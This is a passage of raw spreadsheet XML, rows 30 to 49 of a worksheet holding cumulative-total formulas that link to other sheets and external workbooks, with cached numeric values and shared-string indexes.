        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'18'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]19'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]19'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]19'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]19'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]19'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]19'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]19'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]19'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]19'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]19'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]19'!$E$16</f>
        <v>5198</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'18'!H31</f>
        <v>92431</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1465438</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]19'!$I$16</f>
        <v>4892.74</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'18'!K31</f>
        <v>91573.29</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1447621.42</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]19'!$L$16</f>
        <v>66287.08</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>88.3827733333333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'[11]19'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]19'!$E$13</f>
        <v>6501</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'18'!H32</f>
        <v>97622</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1625465</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]19'!$I$13</f>
        <v>3786</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'18'!K32</f>
        <v>68753</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1090231</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]19'!$L$13</f>
        <v>72702.376</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>145.404752</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]19'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]19'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]19'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]19'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]19'!$U$76</f>
        <v>3.94736842105263e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]19'!$V$76</f>
        <v>4.10764872521247e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]19'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]19'!$R$76</f>
        <v>1.8e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]19'!$S$76</f>
        <v>3.48e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]19'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'18'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]19'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'18'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]19'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]19'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]19'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]19'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]19'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]19'!$U$77</f>
        <v>2.19298245614035e-12</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]19'!$V$77</f>
        <v>59.7240321057616</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]19'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]19'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]19'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]19'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'18'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]19'!$I$50</f>
        <v>2142.89</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'18'!K34</f>
        <v>16604.13</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>483807.06</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]19'!$L$15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'[11]19'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'18'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]19'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'18'!K35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G36+'18'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'18'!K36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G37+'18'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'18'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]19'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]19'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]19'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'18'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]19'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'18'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]19'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'18'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'18'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]19'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]19'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]19'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'18'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]19'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'18'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]19'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'18'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'18'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]19'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]19'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]19'!$R$50</f>
        <v>318.38</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'18'!U39</f>
        <v>5560.54</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>84374.139</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]19'!$V$50</f>
        <v>353</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'18'!X39</f>
        <v>5764</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>84523</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]19'!$Y$50</f>
        <v>1028.086</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'18'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'18'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]19'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]19'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]19'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]19'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]19'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]19'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]19'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]19'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]19'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]19'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]19'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'18'!H41</f>
        <v>10835</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>135811</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]19'!$I$16</f>
        <v>900.79</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'18'!K41</f>
        <v>15612.29</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>137005.83</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]19'!$L$16</f>
        <v>21352.47</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>71.1749</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]19'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]19'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]19'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'18'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]19'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'18'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]19'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]19'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]19'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'18'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]19'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'18'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]19'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]19'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]19'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]19'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'18'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]19'!$V$8</f>
        <v>790</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'18'!X42</f>
        <v>12679</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215150</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]19'!$Y$8</f>
        <v>5427.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]19'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]19'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'18'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]19'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'18'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]19'!$L$14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'[12]19'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'18'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]19'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'18'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]19'!$L$15</f>
        <v>59335.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]19'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]19'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]19'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'18'!U44</f>
        <v>5257</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>70010.168</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]19'!$V$29</f>
        <v>161</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'18'!X44</f>
        <v>3499</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>69909</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]19'!$Y$29</f>
        <v>4057.457</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]19'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'18'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]19'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'18'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]19'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]19'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]19'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]19'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]19'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]19'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]19'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]19'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]19'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'18'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'18'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]19'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]19'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]19'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'18'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]19'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'18'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]19'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'18'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'18'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]19'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]19'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]19'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'18'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]19'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'18'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]19'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'18'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'18'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]19'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]19'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]19'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'18'!U48</f>
        <v>555.83</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6582.36</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]19'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'18'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]19'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'18'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'18'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]19'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]19'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]19'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'18'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]19'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'18'!X49</f>
        <v>143.06</v>
      </c>
      <c r="Y49" s="235">
